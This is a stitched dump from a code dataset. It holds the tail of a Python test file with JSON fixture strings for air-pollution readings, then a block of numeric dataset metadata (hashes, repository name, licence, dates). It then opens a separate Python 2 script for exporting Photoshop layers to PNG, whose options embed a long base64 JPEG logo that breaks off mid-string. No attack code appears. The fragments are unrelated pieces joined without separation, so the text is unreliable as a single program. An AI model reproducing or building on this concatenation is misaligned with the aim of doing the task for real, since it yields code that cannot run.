'"value": 8.871462853221601e-08, "precision": ' \
'-4.999999987376214e-07}], "location": {"country": "UK", ' \
'"name": "test", "coordinates": {"lat": 43.7, "lon": 12.3}, ' \
'"ID": 987}, "interval": "day", "reception_time": 1475283600}'
OZONE_JSON_DUMP = '{"reference_time": 1234567, "location": {"country": "UK", ' \
'"name": "test", "coordinates": {"lat": 43.7, "lon": 12.3}, ' \
'"ID": 987}, "interval": "day", "value": 6.8, ' \
'"reception_time": 1475283600}'
NO2INDEX_JSON_DUMP = '{"reference_time": 1234567, "no2_samples": [{"label": ' \
'"no2", "value": 8.168363052618588e-08, "precision": ' \
'-4.999999987376214e-07}, {"label": "no2_strat", ' \
'"value": 8.686949115599418e-08, "precision": ' \
'-4.999999987376214e-07}, {"label": "no2_trop", ' \
'"value": 8.871462853221601e-08, "precision": ' \
'-4.999999987376214e-07}], "location": {"country": "UK", ' \
'"name": "test", "coordinates": {"lat": 43.7, "lon": 12.3}, ' \
'"ID": 987}, "interval": "day", "reception_time": 1475283600}'
SO2INDEX_JSON_DUMP = '{"reference_time": 1234567, "so2_samples": [{"pressure": ' \
'1000, "value": 8.168363052618588e-08, "precision": ' \
'-4.999999987376214e-07}, {"pressure": 681.2920532226562, ' \
'"value": 8.686949115599418e-08, "precision": ' \
'-4.999999987376214e-07}, {"pressure": 464.15887451171875, ' \
'"value": 8.871462853221601e-08, "precision": ' \
'-4.999999987376214e-07}], "location": {"country": "UK", ' \
'"name": "test", "coordinates": {"lat": 43.7, "lon": 12.3}, ' \
'"ID": 987}, "interval": "day", "reception_time": 1475283600}'
| 62.487179
| 83
| 0.488716
| 210
| 2,437
| 5.571429
| 0.257143
| 0.046154
| 0.092308
| 0.215385
| 0.903419
| 0.807692
| 0.807692
| 0.794017
| 0.705128
| 0.705128
| 0
| 0.301475
| 0.304473
| 2,437
| 38
| 84
| 64.131579
| 0.388791
| 0.011079
| 0
| 0.709677
| 0
| 0.129032
| 0.679434
| 0.173605
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
c485289d8307cb95532f495ede2476bcce5c9243
| 180,686
|
py
|
Python
|
guipsd2png.py
|
MaverickGames/GUIPSD2PNG
|
e050eb84f134229b505231ac9ed107bad580fdf0
|
[
"MIT"
] | 1
|
2017-07-30T22:31:41.000Z
|
2017-07-30T22:31:41.000Z
|
guipsd2png.py
|
MaverickGames/GUIPSD2PNG
|
e050eb84f134229b505231ac9ed107bad580fdf0
|
[
"MIT"
] | null | null | null |
guipsd2png.py
|
MaverickGames/GUIPSD2PNG
|
e050eb84f134229b505231ac9ed107bad580fdf0
|
[
"MIT"
] | null | null | null |
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Date: Jul 14, 2014
Organization: Maverick Games
Language: python
Dependencies:
- Tkinter
- pillow
- psd_tools
- numpy
- scipy
Usage:
- copy this code into workspace directory
- set options at opt: "file_name", "delay_sec", "ignores"...
- terminal: sudo python manager.py
Contact:
- Minu J: minujeong@maverickgames.co
Author: Minu Jeong
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
import os, time, threading, json, re, cStringIO, base64
import imagehash
from psd_tools import *
from Tkinter import *
from PIL import Image, ImageTk
# options
opt = {
# woring file name
"file_name":"genetic_stereotypes.psd",
# directory name to create and save layers
"dirname":"gen_layers",
# unity proejct folders
# format:
# keyword : directory
"unity_delevery_keychar": {},
# create preview file (automatically adds to ignores)
"create_preview": True,
"preview_file": "__preview.jpg",
# create coordination json file (automatically adds to ignores)
"create_coord": True,
"coord_file": "__coordination info.json",
# runing delay: seconds
"delay_sec":3,
# ignore files
"ignores":[".DS_Store"],
# application settings
"app_options":{
# application window size
"width":350,
"height":250,
# preview thumbnail size
"preview_image_width":340,
"preview_image_height":160,
},
"logo_image_source": """
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AAAAAAAAAAAAAAAAAAAAAAAQAAAAAQAAAAAAAG51bGwAAAACAAAABmJvdW5kc09iamMAAAABAAAAAAAAUmN0MQAAAAQAAAAAVG9wIGxvbmcAAAAAAAAAAExlZnRsb25nAAAAAAAAAABCdG9tbG9uZwAAAKAAAAAAUmdodGxvbmcAAAFUAAAABnNsaWNlc1ZsTHMAAAABT2JqYwAAAAEAAAAAAAVzbGljZQAAABIAAAAHc2xpY2VJRGxvbmcAAAAAAAAAB2dyb3VwSURsb25nAAAAAAAAAAZvcmlnaW5lbnVtAAAADEVTbGljZU9yaWdpbgAAAA1hdXRvR2VuZXJhdGVkAAAAAFR5cGVlbnVtAAAACkVTbGljZVR5cGUAAAAASW1nIAAAAAZib3VuZHNPYmpjAAAAAQAAAAAAAFJjdDEAAAAEAAAAAFRvcCBsb25nAAAAAAAAAABMZWZ0bG9uZwAAAAAAAAAAQnRvbWxvbmcAAACgAAAAAFJnaHRsb25nAAABVAAAAAN1cmxURVhUAAAAAQAAAAAAAG51bGxURVhUAAAAAQAAAAAAAE1zZ2VURVhUAAAAAQAAAAAABmFsdFRhZ1RFWFQAAAABAAAAAAAOY2VsbFRleHRJc0hUTUxib29sAQAAAAhjZWxsVGV4dFRFWFQAAAABAAAAAAAJaG9yekFsaWduZW51bQAAAA9FU2xpY2VIb3J6QWxpZ24AAAAHZGVmYXVsdAAAAAl2ZXJ0QWxpZ25lbnVtAAAAD0VTbGljZVZlcnRBbGlnbgAAAAdkZWZhdWx0
AAAAC2JnQ29sb3JUeXBlZW51bQAAABFFU2xpY2VCR0NvbG9yVHlwZQAAAABOb25lAAAACXRvcE91dHNldGxvbmcAAAAAAAAACmxlZnRPdXRzZXRsb25nAAAAAAAAAAxib3R0b21PdXRzZXRsb25nAAAAAAAAAAtyaWdodE91dHNldGxvbmcAAAAAADhCSU0EKAAAAAAADAAAAAI/8AAAAAAAADhCSU0EFAAAAAAABAAAAAw4QklNBAwAAAAAFFUAAAABAAAAoAAAAEsAAAHgAACMoAAAFDkAGAAB/9j/7QAMQWRvYmVfQ00AAf/uAA5BZG9iZQBkgAAAAAH/2wCEAAwICAgJCAwJCQwRCwoLERUPDAwPFRgTExUTExgRDAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwBDQsLDQ4NEA4OEBQODg4UFA4ODg4UEQwMDAwMEREMDAwMDAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDP/AABEIAEsAoAMBIgACEQEDEQH/3QAEAAr/xAE/AAABBQEBAQEBAQAAAAAAAAADAAECBAUGBwgJCgsBAAEFAQEBAQEBAAAAAAAAAAEAAgMEBQYHCAkKCxAAAQQBAwIEAgUHBggFAwwzAQACEQMEIRIxBUFRYRMicYEyBhSRobFCIyQVUsFiMzRygtFDByWSU/Dh8WNzNRaisoMmRJNUZEXCo3Q2F9JV4mXys4TD03Xj80YnlKSFtJXE1OT0pbXF1eX1VmZ2hpamtsbW5vY3R1dnd4eXp7fH1+f3EQACAgECBAQDBAUGBwcGBTUBAAIRAyExEgRBUWFxIhMFMoGRFKGxQiPBUtHwMyRi4XKCkkNTFWNzNPElBhaisoMHJjXC0kSTVKMXZEVVNnRl4vKzhMPTdePzRpSkhbSVxNTk9KW1xdXl9VZmdoaWprbG1ub2JzdHV2d3h5ent8f/2gAMAwEAAhEDEQA/AMCE8Ke1Hwun5/UA52DQb2MgOtL2V1idR+luc3f/ANabYrc8sIDinIQj3keFoxhKRqIMj4NXan2rTs+rnWq2B23EcT/g25BLvv8As/p/9NBxek9SyhZ6VLWvpsNN9dlrGFlgDXbfd/OMfW9lldtXsexVx8Q5Q3WeHp39VMp5XMKvHLXZp7U+1WOo4Ob01jX5LKiywlrHV3B/uDH3Q/2N2s2Ve+xRtxsrGbScur0hktDqHgyx5I3+mx5DHNvZ+fj2srt/4xSQ5rDk4eDJGXHxCNH5jD5+H+7xLZYckb4okVV/4WyHan2omxPtUtrKRbU+1ELVGJQtfCFrdPx87Myvs+G30cjIca2XTFjaW6WuD/8AtHj/AOFusr/WbvZVv+guuxcPD6ditwcBu2hhl9ke66z8++530nbvzFW6DiDF6f8AaCIyc8BxJ5Zjz+gr/wCv/wBIs/62r0Lk/i/OCeWWLF8gP6yf6WXJ/e/ch+hF2+SwcMBOW9egfuR/9CWhKE8Ktm5zMUCtsOyHDc1rjDWt/wBPe78ypv8A4Ks3FjnlmIY4mUpbANuc4wBlI0Avk5ddD6qQPUyLzFVI5ImHWv8A3KWfvo8LN6PTZZZdm31vZa5xr/S/zjiNH2PEN9Nrf5qmlv6Oj9L/AF1qQpOZxxxT9oHilDTJL9H3P0ow/q4/lW4pynHjIoS+Uf1fH+8xhKFQyM5v7bw+nsIlu6y+Znc6qz7PU383dsa+1+7/AIJaMKOeOUBAy09yPuR/u8Uoj/oLozEuKv0Tw/VjCUKUJQmWuf/QyNqu/V8tq6u+kABuRikgAAe6h7Xf+e8h6rbVPEf6HVOn38AX+i8/ychrsf8A8/OpQ+Iw9zk88d/QZDzx/rB/0GHlTw5sZ8a/xvS6Qy+n9N6jmW5fVXX2XkBuCN1hpAO7Y2ij1fe36H0KP0X84k+jrVzb+o4FfonONYFfs9UUVMc2i4ut3Y7crIdZ+k/0GN6Ff84qGbW/E6jn1EH6bsyofvV2
j1D/ANt5AuqeqWPW5rKarW532lrGiuis5PAH6NmH6ZbT9n/0Fm//AI16yIfDoHHhzRzYzLJCMpe/GPsyhjEPR7cOD5JcPut2XMy4pwMJVEkD2z67l+lxS/5rYy+m9XvyasfqD7D649HFdbY2ykOfrkRfWBsvtx2bK6rKmf8ABLQ67l5D83KxKy1+I3GZ6uLa0Oqse822t9Vv8417K2U+lbTZXbR/g1bc3J+ydM6Zm2B/UrbKX3NkFwbQ77Xba+PpemyplPrf4W5Z+TXkX5vUG1VWPy77ntqrDHaNa1uLQ+x+3066fZ6vqOf9BDk80M/MQOcYYY+Wx5SOAe3hlxZIx9+HF+96v/C1ZoHHjkMfHKWSUN/VP5fkLW9H0rG1Bzn12015WM+zV5ptH83a/wDwl2Nb+ifZ/hP0VikWK/m0MGbRj1Hc3p2I3He4fvuNbms/rMqo9T/ryA+vstfkM08vK4sk74pDc7yiJcMJ/wCHD1NTNiAzSjHYH/0Zplqnj4py8qjE4+0WNrcfBp91zv7NLbERzE1OScLKGUBJxqbbAD3c7ZjV/wDSvT+ZynHhyTj8wieH++fTD/nsuPGDKIO16+XV6UZAyMu/0wBTQRVp3fAPpt/kY9Xps/4z/i0SEHAxRiYdVGpcAXWOPLrHn1LXu/lb3Kl9YOr2dNxf1Vm/Ksc2tryJrqNk+lZkH6LfUc3bQx//AFz9EuMhilmzDHiHEZGh+2cv+m7BmIQ4paV/LhX6h1U13N6f05rcrqVugrBDm1D9+8bv5z/R4/5/5/6NaHTPq+Om413VuquGTlMY69tTjuY1zW722X/R9e/T930cf/BLkm5Lfql1VlX1n6JVk2XvD6upusL5c0tfbdXZ6R9S2ux/6b2+qz+ovRetOrs6LlvDg9l1BDXNMh3qgNqc1w/edYxdHy/KQ5SFR1lL58n71fo/1YOfPIc0rOw+WPZwsB2/CpsJJNjd7nOMkucdz3u/lWO/SJs/NZhY/qlvqWPOyiqQN9h1Ddx+hWxv6S+z/BUouRdj4OObLTtppAYIEkx7K662fn2P/MYufbg9e69m2ZP6DFwqv0bbL3Oa2vguxmWNY9tl7ne7IsZ/6TWLyXKHmspnIH2RLiyS/ev1e2P60v0m3my+3ERHz1Uf++ara8xjXdUqa/J+zWjJy8kCGueTGwfu72/o6Kf9F6a6xj67WNtqcH1WND63DgtcNzHf5q0un497cRnTL8GoYT2OYbcS4W07YlwvFzasnff+/wDpllfsz9iZFfT67HW4WS2yzEL/AKdbmEPvxXO/wjNlvr0P/wCPV/4ty/uY45YCjhFGP+p/9dsHKT4ZGJNifX+v/wChM5bvDJ9xBcG94BDXO/6bVKFWxn+tl5Vw1rrLcWs+Jq3PyS3/AK/b6P8AXoVpYchwmvAH/G9TeBsW/wD/0aEKFlJeQfY4D/B2sNlczO51bbKdz/67kaFIBSyAkCDsWsCQbHRHlDL6g6s9QynXCpxdWypjaGgkbXe6rde7c3831lZrOZ6TMcZmSKWNDGVMs2ANGjWbqW12u/7cUWtJ+jG7tOgntKNj4vVnY